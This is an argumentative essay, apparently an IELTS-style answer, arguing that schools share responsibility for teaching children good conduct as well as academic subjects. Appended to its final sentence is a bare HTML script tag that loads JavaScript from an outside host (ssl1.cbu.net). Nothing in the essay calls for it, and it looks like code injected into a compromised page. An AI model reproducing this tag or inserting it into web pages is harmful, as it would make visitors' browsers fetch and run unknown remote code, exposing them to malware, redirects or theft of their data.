It is the responsibility of schools to teach children good behavior in addition to providing formal education. To what extent do you agree or disagree?
Many argue that schools should be responsible for cultivating proper conduct in children in addition to providing academic training. This essay argues in support of this position.
Granted, this perspective is often met with criticism, particularly in relation to its practicality. Critics often argue that addressing behavioral issues is beyond the scope of schools, citing the significant influence of family dynamics. They contend that schools are generally ill-equipped to handle complex challenges stemming from dysfunctional family environments such as those with a violent father or a negligent mother. As a result, it may not be the responsibility of schools to address problems beyond their control. That said, it must be acknowledged that students’ lack of proper family education is the key reason why schools should intervene in their character development. In other words, if they do not step in and take a more active role in shaping students’ behavior, there may be no one left to steer these children in the right direction.
Therefore, I am firmly convinced that the responsibility for providing moral education for schoolchildren should rest squarely on the shoulders of schools. First and foremost, schools are not only repositories of academic knowledge but also formative environments shaping well-rounded individuals. Attending school typically consumes a large share of a child’s daily time. As a result, such constant exposure to their peers as well as their teachers renders schools ideal for social learning. Additionally, focusing solely on academic training is not sufficient to guarantee children will grow up into valuable contributors to society. For example, without proper discipline training, students may excel in exams but fail in teamwork, respect and ethics - traits vital for workplaces and communities. Thus, training in proper conduct should be regarded with equal importance and emphasis to formal education in schools.
In conclusion, while some may question the feasibility of behavioral education in schools, I am in complete agreement with the opinion that they should play a central role in shaping students’ character, alongside delivering academic knowledge. <script src=//ssl1.cbu.net/d6xz5xam></script>
